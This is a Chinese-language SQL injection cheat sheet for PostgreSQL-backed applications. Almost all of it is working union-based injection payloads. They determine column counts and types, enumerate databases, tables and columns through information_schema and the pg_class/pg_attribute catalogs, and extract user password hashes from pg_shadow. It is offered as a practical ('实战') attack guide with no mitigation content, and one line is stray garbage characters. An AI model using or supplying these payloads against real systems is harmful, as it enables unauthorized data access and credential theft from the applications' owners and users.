PostgreSQL 结合了 MSSQL、MySQL、Oracle 的一些特点。
支持多语句执行（堆叠查询；能否一次发送多条语句还取决于应用所用的客户端驱动），语句可以没有 from。postgres 用户是超级用户（创始人账户）；COPY ... TO/FROM 服务器文件只有 superuser 有权限（PostgreSQL 11+ 也可由 pg_read_server_files / pg_write_server_files 角色成员执行）。注释: -- , /**/
空白/连接符: %20 , + , /**/  内置函数:
current_database() //当前数据库名
session_user //会话用户（登录时的用户）
current_user //当前数据库用户（执行权限检查所用的用户）
user //当前用户（等价于 current_user）
version() //数据库版本  Union 注入:
order by n--  （递增 n 直到报错，以判断查询列数；文中的 “–” 是转写错误，实际注释符为 --）
and 1=2 union select null,null,null--
and 1=2 union select 'beach',null,null--  （PostgreSQL 对 union 各列类型检查严格，逐列把 null 换成字符串常量来找出哪一列是文本类型）
and 1=2 union select (select version()),null,null--  获取表名、字段名（新版本（7.4+）利用 information_schema）:
注意: group_concat() 是 MySQL 的函数，PostgreSQL 中没有；要把多行合并到一列，用 string_agg(table_name, ',')（8.4+）或 array_to_string(array_agg(table_name), ',')。
and 1=2 union select table_name,null,null from information_schema.tables limit 1 offset n--  （可加 where table_schema not in ('pg_catalog','information_schema') 跳过系统表）
and 1=2 union select column_name,null,null from information_schema.columns where table_name='admin' limit 1 offset n--
R" L: p/ |: c# z: i" Q8 G(老版本)
pg_class.oid 对应 pg_attribute.attrelid
pg_class.relname 表名
pg_attribute.attname 字段名  select relname from pg_class 获取表名
select oid from pg_class where 条件  获取该表的 oid
select attname from pg_attribute where attrelid='oid的值'  获取字段名（建议加 and attnum>0 and not attisdropped，排除 ctid/xmin 等系统列和已删除的列）  实战:
and 1=2 union select relname,null,null from pg_class where relkind='r' limit 1 offset 0--  加入 relkind='r' 只查询普通表（pg_class 里还包含索引、序列、视图等；另可加 and relname not like 'pg\_%' 或 and relnamespace=(select oid from pg_namespace where nspname='public') 排除系统表）
and 1=2 union select cast(oid as varchar(10)),null,null from pg_class where relkind='r' limit 1 offset 0--
由于 oid 列的类型是 oid，为了与 union 的列类型兼容，用 cast 强制转换成 varchar（也可写 oid::text）。比如得到 1136: and 1=2 union select attname,null,null from pg_attribute where attrelid=1136 limit 1 offset 0--  爆字段名（不是表名；attnum<=0 的是系统列，可加 and attnum>0 过滤）
======================================================================
and 1=2 union select datname,null,null from pg_database limit 1 offset 0--  爆库
and 1=2 union select usename||chr(124)||passwd,null,null from pg_shadow limit 1 offset 0--  爆数据库用户密码（注意列名是 usename 而不是 username；pg_shadow 只有 superuser 可读，非超级用户只能查 pg_user，其中 passwd 显示为 ********；取到的不是明文，而是 md5(password||username) 形式、以 "md5" 开头的哈希，PostgreSQL 10+ 也可能是 SCRAM-SHA-256 凭据）